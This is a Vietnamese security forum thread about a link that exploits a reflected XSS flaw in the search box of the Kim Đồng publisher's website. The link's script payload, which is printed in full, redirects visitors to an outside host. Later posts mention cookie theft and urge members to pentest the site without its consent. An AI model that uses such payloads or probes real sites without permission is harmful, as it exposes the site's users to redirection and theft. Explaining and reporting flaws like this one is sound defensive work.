Mọi người cho em hỏi có phải website này bị hack không ạ

Thảo luận trong 'Hỏi đáp' bắt đầu bởi nothing_1122, 13/05/20, 03:05 PM.

  1. nothing_1122

    nothing_1122 Member

    Tham gia: 13/05/20, 02:05 PM
    Bài viết: 15
    Đã được thích: 0
    Điểm thành tích:
    1
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,749
    Đã được thích: 400
    Điểm thành tích:
    83
    Khả năng là trang web có lỗi redirect hoặc XSS
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. Gấu

    Gấu Moderator Thành viên BQT

    Tham gia: 15/04/20, 09:04 AM
    Bài viết: 8
    Đã được thích: 5
    Điểm thành tích:
    3
    Trang web của NXB Kim Đồng không bị hack. Trong link có dấu hiệu giúp tấn công XSS.
    Chi tiết link khi bạn click ....com.vn/tim-kiem?title=<script>window.location.href ="http://c-l-a-y-f-o-r-u-m.000webhostapp.com/"</script>&amp;fbclid=IwAR0Sx1lPUSUcW2CmPKsL89YgwKZbwIdk53Bb5j5ltxLQrEN1iN3N9DDlQMA
    Khi click link, một đoạn script (<script>window.location.href = "c-l-a-y-f-o-r-u-m.000webhostapp.com"</script>) sẽ được add vào source web và web sẽ thực hiện đoạn script này và chuyển hướng sang trang c-l-a-y-f-o-r-u-m.000webhostapp.com.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    whf and WhiteHat News #ID:2018 like this.
  4. nothing_1122

    nothing_1122 Member

    Tham gia: 13/05/20, 02:05 PM
    Bài viết: 15
    Đã được thích: 0
    Điểm thành tích:
    1
    vậy là website ko bị deface :)
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. nothing_1122

    nothing_1122 Member

    Tham gia: 13/05/20, 02:05 PM
    Bài viết: 15
    Đã được thích: 0
    Điểm thành tích:
    1
    mà mình tấn công xss thì được gì vậy anh :D
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. Gấu

    Gấu Moderator Thành viên BQT

    Tham gia: 15/04/20, 09:04 AM
    Bài viết: 8
    Đã được thích: 5
    Điểm thành tích:
    3
    Theo mình là đúng như vậy. Tốt hơn thì nên kiểm tra dữ liệu đầu vào trước khi thực hiện và hiển thị kết quả tìm kiếm.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. nothing_1122

    nothing_1122 Member

    Tham gia: 13/05/20, 02:05 PM
    Bài viết: 15
    Đã được thích: 0
    Điểm thành tích:
    1
    cho em hỏi nếu file "web.config" và file "hta.access" truy cập được thì tin tặc làm gì để hack web ạ?
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,749
    Đã được thích: 400
    Điểm thành tích:
    83
    XSS thì kẻ tấn công chỉ có thể ăn cắp cookie, hoặc tạo XSS-shell trên khía cạnh trình duyệt.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,749
    Đã được thích: 400
    Điểm thành tích:
    83
    Các tấn công liên quan đến file htaccess bạn có thể xem tại đây.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    nothing_1122 thích bài này.
  10. nothing_1122

    nothing_1122 Member

    Tham gia: 13/05/20, 02:05 PM
    Bài viết: 15
    Đã được thích: 0
    Điểm thành tích:
    1
    cảm ơn anh :D
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  11. Hồn Ma

    Hồn Ma Member

    Tham gia: 04/04/19, 05:04 PM
    Bài viết: 11
    Đã được thích: 1
    Điểm thành tích:
    3
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  12. vohai2003

    vohai2003 Active Member

    Tham gia: 15/05/20, 09:05 PM
    Bài viết: 25
    Đã được thích: 3
    Điểm thành tích:
    3
    Có ai nhắn cho NXB Kim Đồng chưa vậy?
    Nhắn để họ sửa kìa.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  13. nothing_1122

    nothing_1122 Member

    Tham gia: 13/05/20, 02:05 PM
    Bài viết: 15
    Đã được thích: 0
    Điểm thành tích:
    1
    họ ko quan tâm luôn anh ơi :'(
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  14. vohai2003

    vohai2003 Active Member

    Tham gia: 15/05/20, 09:05 PM
    Bài viết: 25
    Đã được thích: 3
    Điểm thành tích:
    3
    Để xem thử còn exploit nào ko.
    Nếu họ ko quan tâm thì mình thử đăng lên bug bounty xem.
    P/s:Nếu ô searching có XSS thì dễ là ô tên đăng nhập trong mục đăng kí cũng có...
     
    Chỉnh sửa cuối: 16/05/20, 08:05 AM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  15. vohai2003

    vohai2003 Active Member

    Tham gia: 15/05/20, 09:05 PM
    Bài viết: 25
    Đã được thích: 3
    Điểm thành tích:
    3
    Mọi người thử pen trang của KĐ đi.
    Đến khi tìm ra hết rồi báo luôn một mẻ.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan